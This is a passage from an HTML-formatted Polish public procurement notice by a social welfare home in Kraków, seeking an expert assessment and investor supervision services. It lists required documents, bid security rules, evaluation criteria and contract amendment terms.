                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
Uwaga:
1)	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu jak wyżej, składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. 
2)	Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby. 
3)	Dokumenty/oświadczenia powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem składania ofert. 

3.2.	Zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo inny dokument potwierdzający, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub inny dokument potwierdzający, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; 
1)	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu jak wyżej składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie zalega z opłacaniem podatków, opłat, składek na ubezpieczenie społeczne lub zdrowotne albo że zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu. 
2)	Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby. 
3)	Dokumenty/oświadczenia powinny być wystawione nie wcześniej niż 3 miesiące przed upływem składania ofert. 

3.3.	Zaświadczenia właściwego naczelnika Urzędu Skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert lub inny dokument potwierdzający, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; 
1)	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu jak wyżej składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie zalega z opłacaniem podatków, opłat, składek na ubezpieczenie społeczne lub zdrowotne albo że zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu. 
2)	Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby. 
3)	Dokumenty/oświadczenia powinny być wystawione nie wcześniej niż 3 miesiące przed upływem składania ofert. 

3.4.	Informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 ustawy wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert : 
1)	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu składa informację z odpowiedniego rejestru albo, w przypadku braku takiego rejestru, inny równoważny dokument wydany przez właściwy organ sądowy lub administracyjny kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dotyczy informacja albo dokument, w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 oraz ust. 5 pkt 5 i 6 ustawy; 
2)	Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby. 
3)	Dokumenty/oświadczenia powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem składania ofert. 
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />3.5.	 Dowody określające czy wykonane usługi podane w Załączniku  Nr 10 do SIWZ  
 
zostały  wykonane należycie, w szczególności - informacja o tym, czy usługi zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone.
 
Zamawiający wprowadził warunki udziału zawarte w SIWZ w jej pierwszej części  w Rozdziale VI  pkt 2.  

W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu lub kryteriów selekcji dotyczących zdolności technicznej lub zawodowej Zamawiający żąda następujących dokumentów:

1)	Wykaz osób biorących udział w wykonywaniu zamówienia ( e k s p e r t y z y )  wraz z informacjami na temat: ich kwalifikacji zawodowych, wykształcenia, zakresu wykonywanych czynności w zakresie sporządzenia ekspertyzy;

2)	Wykaz osób biorących udział w wykonywaniu zamówienia wraz z informacjami na temat : 
ich kwalifikacji zawodowych , doświadczenia , zakresu wykonywanych czynności w zakresie pełnienia  funkcji Inspektora nadzoru inwestorskiego.

Propozycja sposobu przedłożenia w/w dokumentów została zawarta w Załączniku Nr 10   do SIWZ. 

3.6.  Dowody określające czy wykonane usługi podane w Załączniku : Nr 6 ;  Nr 7;  Nr 8 ; Nr  9
 
zostały  wykonane należycie, w szczególności - informacja o tym, czy usługi zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone.

1)	Wykaz usług Projektanta  wykonującego  ekspertyzę lub opracowanie dokumentacji projektowej w specjalności instalacyjnej (wentylacja; instalacje c.o.  ; wod  kan ; gazowa) (Załącznik nr 6 do SIWZ);

2)	Wykaz usług Projektanta  wykonującego  ekspertyzę lub opracowanie dokumentacji projektowej w specjalności konstrukcyjno-budowlanej (Załącznik nr 7 do SIWZ);

3)	Wykaz usług  inżyniera kontraktu/inwestora zastępczego/inspektora nadzoru w branży konstrukcyjno-budowlanej (Załącznik nr 8 do SIWZ);

4)	Wykaz usług w zakresie nadzoru nad robotami budowlanymi w zakresie instalacji  i urządzeń cieplnych; wentylacyjnych; gazowych; wod-kan)  oraz ekspertyzy dokumentacji projektowej w zakresie sieci instalacyjnej : instalacje elektryczne (Załącznik nr 9 do SIWZ);

wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, w okresie ostatnich 3 lat przed upływem terminu składania ofert o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane z załączeniem dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie Wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

Propozycja sposobu przedłożenia w/w dokumentów została zawarta w Załączniku Nr, 6; 7; 8 ; 9  do SIWZ.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1.1.	Dowód wniesienia wadium wraz ze wskazaniem rachunku bankowego, na który Zamawiający winien zwrócić wadium (w przypadku wniesienia wadium w pieniądzu). 
========================================================================
1.2.	 Pełnomocnictwo złożone w formie oryginału lub kopii poświadczonej notarialnie. 

a)	W przypadku podpisywania oferty przez osoby nie wymienione w odpisie z właściwego rejestru  pełnomocnictwo do podpisania oferty lub podpisania oferty i zawarcia Umowy. 
b)	W przypadku podmiotów występujących wspólnie pełnomocnictwo podpisane przez upoważnionych przedstawicieli każdego z podmiotów występujących wspólnie, do reprezentowania w postępowaniu (zgodnie z art. 23 ustawy Pzp). 
========================================================================
1.3.	Zobowiązanie innego podmiotu, na zasobach którego polega Wykonawca, do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia. 
1.4. do oferty należy dołączyć uzupełniony Formularz ofertowy stanowiący załącznik nr 4 do SIWZ, </div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1.	Zamawiający żąda od każdego z Wykonawców wniesienia wadium (zgodnie z art. 45 ustawy Pzp.).
2.	Wykonawca przed upływem terminu składania ofert określonym w niniejszej SIWZ,  zobowiązany jest wnieść wadium w wysokości zł brutto: 2.200,00,- zł brutto (słownie: dwa tysiące dwieście złotych).
3.	Wadium może być wnoszone:
1)	w pieniądzu - przelewem wpłacane na rachunek bankowy wskazany przez Zamawiającego 
PKO BP SA Depozyty  nr  85102028920000550205898608
Tytułem  Wadium  Sporządzenie ekspertyzy i pełnienie nadzoru  w DPS Helclów 
tak aby przed upływem terminu składania ofert, wadium znajdowało się na ww. rachunku.
UWAGA: W przypadku wnoszenia wadium na rzecz Wykonawcy przez inny podmiot, w tytule przelewu należy wyraźnie wskazać na rzecz jakiego Wykonawcy wnoszone jest wadium).
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	 gwarancjach bankowych,
4)	 gwarancjach ubezpieczeniowych,
5)	 poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2014r. poz. 1804 oraz z 2015r. poz. 978 i 1240). 
4.	Dopuszczalne jest złożenie wadium w więcej niż jednej formie.
5. Wadium wnoszone w formie gwarancji i poręczeń musi spełniać następujące wymogi:
1)	musi być wystawione na Dom Pomocy Społecznej im. L. i A. Helclów, 31-148 Kraków, ul. Helclów 2 ,
2)	musi zawierać w swej treści oświadczenie gwaranta (poręczyciela), w którym zobowiązuje się on do bezwarunkowej wypłaty kwoty wadium na pierwsze żądanie Zamawiającego zawierające oświadczenie, iż zaszła jedna z przesłanek wymienionych w art. 46 ust. 4a i 5 ustawy,
3)	w przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia  musi obejmować zobowiązanie gwaranta (poręczyciela) z tytułu związanych z postępowaniem o udzielenie zamówienia działań lub zaniechań opisanych art. 46 ust. 4a i 5 ustawy każdego z tych wykonawców,
4)	okres ważności wadium nie może być krótszy niż okres związania ofertą.
6.	Zgodnie z art. 46 ustawy Pzp. Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt. 10, 12.  

7.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu Umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania Umowy, jeżeli jego wniesienia żądano. 

8.	Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert. 

9.	Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie pkt. 6, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego. 

10.	Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 i 3a, z przyczyn leżących po jego stronie, nie złożył oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1, oświadczenia, o którym mowa w art. 25a ust. 1, pełnomocnictw lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co spowodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej. 

11.	Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę. 
a)	W przypadku nie wskazania w ofercie rachunku bankowego, na który należy zwrócić wadium, Zamawiający uzna, że wskazanym rachunkiem bankowym jest rachunek, z którego dokonano przelewu wpłaty wadium. 
12.	Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana: 
a)	odmówił podpisania Umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania Umowy,
c)	 zawarcie Umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy. 
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>2)	Doświadczenie zawodowe inżyniera kontraktu/inwestora zastępczego/inspektora nadzoru w branży konstrukcyjno-budowlanej </td><td>15</td></tr><tr><td>3)	Doświadczenie zawodowe projektanta w specjalności  konstrukcyjno-budowlanej</td><td>10</td></tr><tr><td>4)	Doświadczenie zawodowe projektanta w specjalności  instalacyjnej (wentylacja, instalacje, c.o., wod-kan., gazowa)</td><td>10</td></tr><tr><td>5)	Skrócenie terminu sporządzenia ekspertyzy  I      ETAP</td><td>5</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.	Żadna ze Stron nie może żądać zmiany Umowy chyba, że zachodzą okoliczności, o których mowa w art. 144 ust. 1 ustawy Prawo zamówień publicznych  (tj. Dz. U. z 2015 r. poz. 2164 z późn. zm.),.
2.	Zamawiający przewiduje możliwość zmiany Umowy w następujących przypadkach: 
1)	zmian regulacji prawnych obowiązujących w dniu zawarcia Umowy, 
2)	zmiany wysokości wynagrodzenia w przypadku:
a)	zmiany stawki podatku VAT,
b)	zmniejszenia zakresu zamówienia, 
3)	zmiany terminu realizacji, w przypadku:
a)	opóźnień leżących po stronie Zamawiającego,
b)	wystąpienia po zawarciu Umowy okoliczności niezależnych od Wykonawcy lub Zamawiającego, w szczególności spowodowanych działaniem  siły wyższej, zdarzeniami losowymi lub powstałymi na skutek działań lub zaniechań osób trzecich, 
mających wpływ na terminowość wykonania robót budowlanych,
c)	wystąpienia okoliczności, których Strony Umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności,
d)	zaistnienia konieczności udzielenia zamówień, o których mowa  w przepisie art. 67 ust.1 pkt 6 Prawo zamówień publicznych  o ile wykonanie tych zamówień wpływa na terminy wykonania Umowy,
e)	gdy organy dokonujące uzgodnień nie wydadzą zgód i pozwoleń w ustawowo określonym terminie, zgodnie ze stosowanymi procedurami,
4)	zmiany zakresu zamówienia w przypadku gdy:
a)	w 2107 roku  w toku realizacji Umowy okaże się, że wskazany w Umowie zakres jest niemożliwy do wykonania lub jego realizacja nie leży w interesie publicznym,
b)	z uwagi na trwający proces uzyskiwania pozwoleń i uzgodnień niezbędnych do realizacji zadań, wykonanie tych zadań nie byłoby możliwe w 2017 roku. 
5)	powierzenia realizacji przedmiotu Umowy podwykonawcą oraz zmiany zakresu czynności im powierzonych.
6)	zmiany zakresu rzeczowego zamówienia, gdy ze względów społecznych lub gospodarczych w trakcie trwania realizacji przedmiotu Umowy wystąpią okoliczności powodujące, że niecelowym dla Zamawiającego byłoby wykonanie pełnego zakresu przedmiotu zamówienia.
3.	Zmiana postanowień Umowy dokonana z naruszeniem powyższych postanowień jest nieważna.
4.	Zmian w rozumieniu przepisu art. 144 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tj. Dz. U. z 2015 r. poz. 2164 z późn. zm.) nie stanowią:
1)	zmiany danych związanych z obsługą organizacyjno-administracyjną niniejszej Umowy,
2)	zmiany osób wskazanych w Umowie i danych kontaktowych Zamawiającego i Wykonawcy. 
5.	O wystąpieniu zmian w powyższym zakresie właściwa Strona zawiadamia pisemnie drugą Stronę Umowy.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 03/02/2017, godzina: 8:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />1.	Wybrany Wykonawca zobowiązany jest  przed zawarciem Umowy  do:
a)	wniesienia zabezpieczenie należytego wykonania Umowy zgodnie z zasadami opisanymi w SIWZ,
